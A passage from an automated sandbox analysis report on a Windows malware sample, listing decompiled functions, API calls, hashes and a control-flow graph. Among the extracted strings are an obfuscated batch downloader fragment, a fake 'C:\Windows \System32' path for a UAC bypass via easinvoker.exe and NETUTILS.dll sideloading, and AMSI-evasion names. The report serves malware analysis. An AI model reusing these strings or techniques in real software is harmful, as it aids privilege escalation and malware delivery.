                                                                                                                            • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0299C5AC), ref: 0299C547
                                                                                                                            • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0299C55C
                                                                                                                            • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0299C588
                                                                                                                            • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0299C591
                                                                                                                              • Part of subcall function 02984C24: SysFreeString.OLEAUT32(0299D42C), ref: 02984C32
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1897104825-0
                                                                                                                            • Opcode ID: 5c6a237a522699dc0af2b9d786bc99d48b4a132028e6a549e84b0f0a19d8aa58
                                                                                                                            • Instruction ID: 5f74c2d06d2de8e6c36a96ff4064d37bb85fc2c58c2de1fe8789cfabc2da68b4
                                                                                                                            • Opcode Fuzzy Hash: 5c6a237a522699dc0af2b9d786bc99d48b4a132028e6a549e84b0f0a19d8aa58
                                                                                                                            • Instruction Fuzzy Hash: 2921E871A503097AEF11EAE8CC42FDEB7BDEF48710F540466B604F71C0EA74AA058B65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0299C8AC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0299C9EA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CheckConnectionInternet
                                                                                                                            • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                            • API String ID: 3847983778-3852638603
                                                                                                                            • Opcode ID: 2f74b806c6fcd633e44d6aad67e1d0348284547dfa7004b44400d968458a7fc2
                                                                                                                            • Instruction ID: 5f7338326ca5e167bfddaaa1dd1e34e16cb0257da8b8b34ce1e04b540651f83c
                                                                                                                            • Opcode Fuzzy Hash: 2f74b806c6fcd633e44d6aad67e1d0348284547dfa7004b44400d968458a7fc2
                                                                                                                            • Instruction Fuzzy Hash: 1D41EA31A112499BEF10FBA8DD81EDEB7FAEFC8B14F645426E041B7250DA75AD018F60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0299C3F6 Relevance: 6.1, APIs: 4, Instructions: 81nativefileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02984EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02984EF2
                                                                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C4CA), ref: 0299C437
                                                                                                                            • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0299C471
                                                                                                                            • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0299C49E
                                                                                                                            • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0299C4A7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3764614163-0
                                                                                                                            • Opcode ID: 2b49ceb02edd4226e4778ddb04be474d1de1f92f3b45d0b7c7b7837063600821
                                                                                                                            • Instruction ID: d0b11ccbb16c359c077e3bc8b0f79d0340d97c200c2908c7f067def26061be16
                                                                                                                            • Opcode Fuzzy Hash: 2b49ceb02edd4226e4778ddb04be474d1de1f92f3b45d0b7c7b7837063600821
                                                                                                                            • Instruction Fuzzy Hash: 8921C271A40209BAEB10EBA4CC42FEEB7BDEF48B10F514462B604F71C0D7B4AE048A54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0299C3F8 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02984EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02984EF2
                                                                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C4CA), ref: 0299C437
                                                                                                                            • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0299C471
                                                                                                                            • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0299C49E
                                                                                                                            • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0299C4A7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3764614163-0
                                                                                                                            • Opcode ID: 7ad8578d0716f0f4d2883938aa5de7174a3a599dc47e7b4cd8f5cfb4f38ce3b8
                                                                                                                            • Instruction ID: 4726f10cf55fcc2c0afe96f1dfc432c9938926f870532acb0b25707ec40ef32b
                                                                                                                            • Opcode Fuzzy Hash: 7ad8578d0716f0f4d2883938aa5de7174a3a599dc47e7b4cd8f5cfb4f38ce3b8
                                                                                                                            • Instruction Fuzzy Hash: 7A21C171A40209BAEB10EBE4CC42FEEB7BDEF48B10F614462B604F71C0D7B4AE048A54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0299C368 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02984EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02984EF2
                                                                                                                            • RtlInitUnicodeString.N(?,?,00000000,0299C3E2), ref: 0299C390
                                                                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0299C3E2), ref: 0299C3A6
                                                                                                                            • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0299C3E2), ref: 0299C3C5
                                                                                                                              • Part of subcall function 02984C24: SysFreeString.OLEAUT32(0299D42C), ref: 02984C32
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1694942484-0
                                                                                                                            • Opcode ID: 04a8fb315ef8d24e34d95f96107fc9c2ecc209412234dc70c0e16f032f6f191a
                                                                                                                            • Instruction ID: 820cb799d5032e6fec4ee44bac3f7422d105abc8dd97eaeb51b56b1ff87f20f4
                                                                                                                            • Opcode Fuzzy Hash: 04a8fb315ef8d24e34d95f96107fc9c2ecc209412234dc70c0e16f032f6f191a
                                                                                                                            • Instruction Fuzzy Hash: 8901F475940208BBDF01EBA4CD42FCEB3FDEB8C710F904572A601E7580EA74AB048A69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 02996D84 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02996D28: CLSIDFromProgID.OLE32(00000000,?,00000000,02996D75,?,?,?,00000000), ref: 02996D55
                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,02996E68,00000000,00000000,02996DE7,?,00000000,02996E57), ref: 02996DD3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFromInstanceProg
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2151042543-0
                                                                                                                            • Opcode ID: 5254ee1c1310cf129891ea82f89374fa4416d3c6dad30dabc50dd87d823ab021
                                                                                                                            • Instruction ID: 3f45dfbae067c40dd8dc78262a8a351f2f6f0faec8890a459d8e29875aa771f4
                                                                                                                            • Opcode Fuzzy Hash: 5254ee1c1310cf129891ea82f89374fa4416d3c6dad30dabc50dd87d823ab021
                                                                                                                            • Instruction Fuzzy Hash: BA01A7716087046FEF05EFA9DC52D6F7BADDBC9B20F920475F505D2680E6709910C964
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 029A1AC0 Relevance: 46.7, APIs: 2, Strings: 23, Instructions: 2959sleepprocessCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02997BE8: LoadLibraryW.KERNEL32(?,00000000,02997C9A), ref: 02997C18
                                                                                                                              • Part of subcall function 02997BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02997C9A), ref: 02997C1E
                                                                                                                              • Part of subcall function 02997BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02997C37
                                                                                                                              • Part of subcall function 0299C3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C4CA), ref: 0299C437
                                                                                                                              • Part of subcall function 0299C3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0299C471
                                                                                                                              • Part of subcall function 0299C3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0299C49E
                                                                                                                              • Part of subcall function 0299C3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0299C4A7
                                                                                                                              • Part of subcall function 02987E18: GetFileAttributesA.KERNEL32(00000000,?,0299E0EE,ScanString,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,ScanString,029E4344,029A8FEC,UacScan,029E4344,029A8FEC,UacInitialize), ref: 02987E23
                                                                                                                            • Sleep.KERNEL32(00001770,UacScan,029E4344,029A8FEC,ScanString,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,ScanBuffer,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC), ref: 029A3094
                                                                                                                              • Part of subcall function 0299C368: RtlInitUnicodeString.N(?,?,00000000,0299C3E2), ref: 0299C390
                                                                                                                              • Part of subcall function 0299C368: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0299C3E2), ref: 0299C3A6
                                                                                                                              • Part of subcall function 0299C368: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0299C3E2), ref: 0299C3C5
                                                                                                                            • WinExec.KERNEL32(00000000,029A953C), ref: 029A436D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FilePath$NameName_$AddressAttributesCloseCreateDeleteExecHandleInitLibraryLoadModuleProcSleepStringUnicodeWrite
                                                                                                                            • String ID: .url$@echo offset "Nnqr=set "%Nnqr%"njyC=="%Nnqr%"qkMvMLsfma%njyC%http"%Nnqr%"dbvWEsxWns%njyC%rem "%Nnqr%"NpzRZtRBVV%njyC%Cloa"%Nnqr%"ftNVZzSZxa%njyC%/Bat"%Nnqr%"TwupSEtIWD%njyC%gith"%Nnqr%"yIGacXULig%njyC%k"%Nnqr%"uGlGnqCSun%njyC%h2sh"%Nnqr%"FU$C:\Users\Public\$C:\Users\Public\alpha.exe$C:\Windows \System32\NETUTILS.dll$C:\Windows \System32\aaa.bat$C:\Windows \System32\easinvoker.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CO.bat$HotKey=$IconIndex=$Initialize$O.bat$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$[InternetShortcut]$er.e$s.d
                                                                                                                            • API String ID: 102611719-1347945576
                                                                                                                            • Opcode ID: 5a8b51f5b2636c78e4e079fb3299e1098722b3f5ab16a34f49f9003ddf9cb3d6
                                                                                                                            • Instruction ID: 87d137767a65e2ac38ca743ae2ab5faad2b57a40f5d90ff14318df91e4438d6e
                                                                                                                            • Opcode Fuzzy Hash: 5a8b51f5b2636c78e4e079fb3299e1098722b3f5ab16a34f49f9003ddf9cb3d6
                                                                                                                            • Instruction Fuzzy Hash: 9153E931A5025ADFEF60FB64D890E9D73B6BFC9704F1454A6A009AB650DF70AE81CF90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 029A4EFE Relevance: 18.4, APIs: 2, Strings: 8, Instructions: 941processCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 10531 29a4efe-29a53da call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 2984964 call 2984698 call 299d318 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 10668 29a53e0-29a565b call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 29848b0 10531->10668 10669 29a53db call 2997be8 10531->10669 10742 29a6190-29a638f call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 29848b0 10668->10742 10743 29a5661-29a5cb3 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 29847b0 call 2984964 WinExec call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984964 call 2984698 call 2999e70 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2983694 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 10668->10743 10669->10668 10860 29a6b54-29a6cd7 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 29848b0 10742->10860 10861 29a6395-29a69b4 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2982ee0 call 2982f08 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 GetCurrentProcess call 2997968 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 10742->10861 11306 29a5cba-29a5f98 call 2995aa8 call 2984b90 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 29849bc RtlMoveMemory call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 299a1c0 call 29836c4 10743->11306 11307 29a5cb5-29a5cb8 10743->11307 10995 29a74a8-29a8b96 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 * 16 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 ExitProcess 10860->10995 10996 29a6cdd-29a6cec call 29848b0 10860->10996 11561 29a69bb-29a6b4f call 29849bc call 299c5bc call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 EnumSystemLocalesA 10861->11561 11562 29a69b6-29a69b9 10861->11562 10996->10995 11007 29a6cf2-29a6fc5 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 299d198 call 2984824 call 2984964 call 2984698 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2987e18 10996->11007 11332 29a6fcb-29a729d call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 299c74c call 29844f4 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984da4 * 2 call 2984728 call 299c3f8 11007->11332 11333 29a72a2-29a74a3 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 29849bc call 2997f48 11007->11333 11307->11306 11332->11333 11333->10995 11561->10860 11562->11561
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02997BE8: LoadLibraryW.KERNEL32(?,00000000,02997C9A), ref: 02997C18
                                                                                                                              • Part of subcall function 02997BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02997C9A), ref: 02997C1E
                                                                                                                              • Part of subcall function 02997BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02997C37
                                                                                                                              • Part of subcall function 0299D318: RegOpenKeyA.ADVAPI32(?,00000000,029E4798), ref: 0299D35C
                                                                                                                              • Part of subcall function 0299D318: RegSetValueExA.ADVAPI32(0000083C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D3C7), ref: 0299D394
                                                                                                                              • Part of subcall function 0299D318: RegCloseKey.ADVAPI32(0000083C,0000083C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D3C7), ref: 0299D39F
                                                                                                                            • WinExec.KERNEL32(00000000,00000000), ref: 029A57F9
                                                                                                                              • Part of subcall function 02999E70: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 02999F33
                                                                                                                            • RtlMoveMemory.N(00000000,?,00000000,?,ScanBuffer,029E4344,029A8FEC,UacScan,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC), ref: 029A5D7B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
